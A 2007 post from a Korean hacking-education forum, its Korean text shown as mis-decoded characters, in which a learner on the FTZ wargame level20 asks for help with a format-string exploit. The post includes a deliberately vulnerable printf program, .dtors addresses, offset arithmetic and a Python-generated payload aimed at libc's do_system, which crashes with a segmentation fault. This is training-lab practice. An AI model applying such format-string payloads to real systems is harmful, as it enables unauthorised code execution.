http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2595 [º¹»ç]
¸îÀϸ¸¿¡ ¿À³×¿ä.. ¤»¤»
http://x82.inetcop.org/h0me/papers/FC_exploit/FC-remote_do_system.txt
http://x82.inetcop.org/h0me/papers/FC_exploit/FC_local_do_system.txt
http://x82.inetcop.org/h0me/papers/FC_exploit/FC_local_do_system2.txt
À§ ¹®¼µéÀ» º¸¸ç... ½Ç½ÀÇÏ´Â ÁßÀÔ´Ï´Ù¸¸...
telnet ftz.hacekrschool.org¿¡¼ Å×½ºÆ®°¡ Àß ¾ÈµÇ¾î¼ Áú¹®µå¸³´Ï´Ù....
------------------------------------------
[level20@ftz in]$ cat printf.c
#include <stdio.h>
int main(int argc,char *argv[])
{
char buf[256];
strncpy(buf,argv[1],256-1);
printf(buf);
}
[level20@ftz in]$ gcc -o printf printf.c
[level20@ftz in]$ objdump -s -j .dtors printf
printf: file format elf32-i386q
Contents of section .dtors:
8049530 ffffffff 00000000 ........
[level20@ftz in]$
"\x34\x95\x04\x08\x36\x95\x04\x08"
"\x38\x95\x04\x08\x3a\x95\x04\x08"
Dump of assembler code for function do_system:
0x400644b0 <do_system+0>: push %ebp
0x400644b1 <do_system+1>: mov %esp,%ebp
0x44b0=17584 / 17584-16=17568
0x14006=81926 / 81926-17584=64342
0x6873 > 0x16873=92275 / 92275-81926=10349
0x0000 > 0x20000=131072 / 131072-92275=38797
%17568x%4$n
%64342x%5$n
%10349x%6$n
%38797x%7$n
[level20@ftz in]$ ./printf `python -c 'print "\x34\x95\x04\x08\x36\x95\x04\x08"+"\x38\x95\x04\x08\x3a\x95\x04\x08"+"%17568x%4$n%64342x%5$n%10349x%6$n%38797x%7$n"'`
...... ...... sh: -c: option requires an argument
¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù
[level20@ftz in]$
-----------------------------------------
gdb »ó¿¡¼,
x/x $ebp+8 À» Çغ¸¸é... 0x00000000°ªÀÌ µé¾î°¡ Àֳ׿ä...
0x08049538ÀÌ µé¾î°¡¾ß Çϴµ¥... ¿Ö ±×·±°É±î¿ä?
------------------------------------------
[level20@ftz in]$ cat test.c
int main()
{
system("sh");
}
À§ ¿¹Á¦·Î Å×½ºÆ®Çغ»°á°ú...
br *do_system+8 ±îÁö ½ÇÇàÇÑÈÄ
x/x $ebp+8 ÀÇ °ªÀº, "sh"¹®ÀÚ¿À» Á¤»óÀûÀ¸·Î °¡¸£Å°°í Àִµ¥ ¸»ÀÔ´Ï´Ù...
ÈÞ... ¿Ø¸¸Çϸé.. ½º½º·Î ÇØ°áÇغ¸·Á°í Çߴµ¥...
´äÀÌ ¾È³ª¿À³×¿ä... ÈåÀ½..
Á¶¾ð ºÎŹµå¸³´Ï´Ù... ±Á½Å±Á½Å. ^^; |
Hit : 3697 Date : 2007/12/05 11:31
|